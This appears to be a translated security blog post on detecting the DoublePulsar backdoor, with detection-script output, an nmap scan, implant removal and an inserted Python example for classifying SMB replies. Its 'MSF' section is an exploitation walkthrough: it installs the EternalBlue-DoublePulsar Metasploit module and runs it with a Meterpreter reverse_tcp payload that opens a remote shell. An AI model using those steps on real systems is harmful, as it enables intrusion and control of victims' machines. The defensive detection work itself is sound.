0x00 Preface

The DoublePulsar backdoor usually shows up together with WannaCry, so it needs to be checked for during incident response and internal-network host security sweeps.

0x01 DoublePulsar Backdoor Detection

About DoublePulsar

DoublePulsar is a backdoor implant developed by the NSA's Equation Group and leaked by The Shadow Brokers in early 2017. Within a few weeks the tool had infected more than 200,000 Microsoft Windows machines, and it was used together with EternalBlue in the WannaCry ransomware attack of May 2017.

DoublePulsar runs in kernel mode and is a rootkit, which gives criminals a high level of control over the compromised system. Once installed it accepts three commands: ping, kill and exec; exec can be used to load malware onto the system.

For a detailed analysis see: https://www.freebuf.com/news/138725.html

DoublePulsar Backdoor Detection Methods

GitHub detection script

Project: https://github.com/countercept/doublepulsar-detection-script

The scripts run under Python 2 and come in two variants, one for SMB and one for RDP.

root@kali:~# python detect_doublepulsar_smb.py --ip 192.168.175.128
[-] [192.168.175.128] No presence of DOUBLEPULSAR SMB implant

root@kali:~# python detect_doublepulsar_smb.py --ip 192.168.175.128
[+] [192.168.175.128] DOUBLEPULSAR SMB IMPLANT DETECTED!!!

root@kali:~# python detect_doublepulsar_rdp.py --file ips.list --verbose --threads 1
[*] [192.168.175.141] Sending negotiation request
[*] [192.168.175.141] Server explicitly refused SSL, reconnecting
[*] [192.168.175.141] Sending non-ssl negotiation request
[*] [192.168.175.141] Sending ping packet
[-] [192.168.175.141] No presence of DOUBLEPULSAR RDP implant
[*] [192.168.175.143] Sending negotiation request
[*] [192.168.175.143] Server chose to use SSL - negotiating SSL connection
[*] [192.168.175.143] Sending SSL client data
[*] [192.168.175.143] Sending ping packet
[-] [192.168.175.143] No presence of DOUBLEPULSAR RDP implant
[*] [192.168.175.142] Sending negotiation request
[*] [192.168.175.142] Sending client data
[*] [192.168.175.142] Sending ping packet
[+] [192.168.175.142] DOUBLEPULSAR RDP IMPLANT DETECTED!!!

root@kali:~# python2 detect_doublepulsar_smb.py --ip 192.168.175.136 --uninstall
[+] [192.168.175.136] DOUBLEPULSAR SMB IMPLANT DETECTED!!! XOR Key: 0x7c3bf3c1
[+] [192.168.175.136] DOUBLEPULSAR uninstall successful
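To show what the SMB script keys on, here is an added Python 3 example (not part of this page and not code from the countercept project): it parses the SMB1 reply to the scanner's Trans2 SESSION_SETUP "ping", treats a Multiplex ID of 0x51 (instead of the 0x41 the scanner sent) as the implant's fingerprint, and derives the XOR key and architecture from the signature field the same way the countercept script and the Metasploit module do. The packets are constructed fixtures, not real captures; the IPs are reused from the output above.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
MID_CLEAN = 0x41         # a clean host echoes the Multiplex ID the scanner sent (65)
MID_DOUBLEPULSAR = 0x51  # the implant's hooked Trans2 handler answers with 81 instead

def parse_smb_response(data):
    # Split a NetBIOS-framed SMB1 response into the header fields the check needs.
    if len(data) < 36:
        raise ValueError("too short for NetBIOS session header + 32-byte SMB header")
    if data[0] != 0x00 or int.from_bytes(data[1:4], "big") != len(data) - 4:
        raise ValueError("bad NetBIOS session header")
    hdr = data[4:36]
    if hdr[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 header")
    return {"command": hdr[4],
            "signature": struct.unpack("<Q", hdr[14:22])[0],  # raw offsets 18..25
            "mid": struct.unpack("<H", hdr[30:32])[0]}        # raw offsets 34..35

def calculate_doublepulsar_xor_key(s):
    # Same derivation as the countercept script / Metasploit module: the implant leaks
    # its per-host XOR key (and its architecture, in the high 32 bits) in the signature.
    x = 2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))
    return x & 0xffffffff

def classify_ping_response(data):
    # Verdict on the reply to the scanner's Trans2 SESSION_SETUP "ping".
    hdr = parse_smb_response(data)
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return {"verdict": "unexpected", "mid": hdr["mid"]}
    if hdr["mid"] == MID_DOUBLEPULSAR:
        sig = hdr["signature"]
        return {"verdict": "implant", "mid": hdr["mid"],
                "xor_key": calculate_doublepulsar_xor_key(sig),
                "arch": "x86" if sig & 0xffffffff00000000 == 0 else "x64"}
    return {"verdict": "clean" if hdr["mid"] == MID_CLEAN else "unexpected", "mid": hdr["mid"]}

def build_response(mid, signature=0):
    # Constructed fixture: minimal Trans2 response with the given MID/signature (TID/PID/UID arbitrary).
    hdr = (SMB_MAGIC + bytes([SMB_COM_TRANSACTION2]) + b"\x00" * 4 + b"\x98\x07\xc0\x00\x00"
           + struct.pack("<Q", signature) + b"\x00\x00"
           + struct.pack("<HHHH", 0x0008, 0xfeff, 0x0800, mid))
    return b"\x00" + (len(hdr) + 3).to_bytes(3, "big") + hdr + b"\x00\x00\x00"  # WordCount/ByteCount = 0

if __name__ == "__main__":
    for ip, pkt in (("192.168.175.128", build_response(MID_CLEAN)),
                    ("192.168.175.136", build_response(MID_DOUBLEPULSAR, 0x0000000100000002))):
        print(ip, classify_ping_response(pkt))
```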

Nmap

Reference: https://nmap.org/nsedoc/scripts/smb-double-pulsar-backdoor.html

nmap -p 445 <target> --script=smb-double-pulsar-backdoor

Scan output:

| smb-double-pulsar-backdoor:
| VULNERABLE:
| Double Pulsar SMB Backdoor
| State: VULNERABLE
| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
| The Double Pulsar SMB backdoor was detected running on the remote machine.
|
| Disclosure date: 2017-04-14
| References:
| https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
| https://github.com/countercept/doublepulsar-detection-script
|_ https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation

MSF

Using the Metasploit module:

# Download the MSF module and copy it into the modules directory
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit/
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

# Install dependencies
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 --fix-missing

# Create the .wine/drive_c directory, otherwise the module later fails with a "directory does not exist" error
mkdir -p /root/.wine/drive_c

# Start MSF and reload the modules
msfconsole
reload_all

# Run the module
use exploit/windows/smb/eternalblue_doublepulsar
set rhost 192.168.200.142
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.200.130
set PROCESSINJECT explorer.exe # Note: PROCESSINJECT must be set; with the default value it did not succeed, changing PROCESSINJECT to explorer.exe worked
run

Defence

If a host is flagged by the scan, the detection script shown earlier can be used to remove the implant:

python2 detect_doublepulsar_smb.py --ip 192.168.175.136 --uninstall

Then install the patch.